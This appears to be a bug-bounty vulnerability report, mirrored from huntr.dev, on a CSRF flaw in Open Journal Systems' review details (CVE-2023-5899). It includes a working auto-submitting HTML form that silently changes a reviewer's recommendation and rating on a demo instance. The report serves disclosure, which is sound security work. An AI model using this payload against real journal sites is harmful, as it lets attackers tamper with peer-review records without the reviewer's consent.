Lucene search
Hainguyen02070C7F1981-3BBA-4508-A07E-4CB9A2553216HistoryOct 12, 2023 - 6:25 p.m.
CSRF in Review Details
2023-10-1218:25:11
hainguyen0207
www.huntr.dev
6
csrf
vulnerability
fake review
Description
CSRF in Review Details
Proof of Concept
1 . Attacker send form fake to user
<html>
<body>
<form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-
journal/$$$call$$$/grid/users/reviewer/reviewer-grid/review-read">
<input type="hidden" name="csrfToken" value="" />
<input type="hidden" name="reviewAssignmentId" value="12" />
<input type="hidden" name="submissionId" value="697" />
<input type="hidden" name="stageId" value="3" />
<input type="hidden" name="recommendation" value="2" />
<input type="hidden" name="quality" value="2" />
<input type="hidden" name="submitFormButton" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
2 .User click, changed unwanted Recommendation and Reviewer rating changes
Video Poc
https://drive.google.com/file/d/1jUapGuHL1vR173QqXCdTGxybLXgbG99M/view?usp=sharing
Payload Poc
https://drive.google.com/file/d/11Xob6yqU12MEpK1aJVWRIJi5-3aduVu5/view?usp=sharing
Related
cve
cve
CVE-2023-5899
2023-11-01 01:15:08
prion
prion
Cross site request forgery (csrf)
2023-11-01 01:15:00
nvd
nvd
CVE-2023-5899
2023-11-01 01:15:08
osv
osv
CVE-2023-5899
2023-11-01 01:15:08
cvelist
cvelist
CVE-2023-5899 Cross-Site Request Forgery (CSRF) in pkp/pkp-lib
2023-11-01 00:00:41
AI Score
7.1
Confidence
Low
EPSS
0.001
Percentile
24.1%
Related for 0C7F1981-3BBA-4508-A07E-4CB9A2553216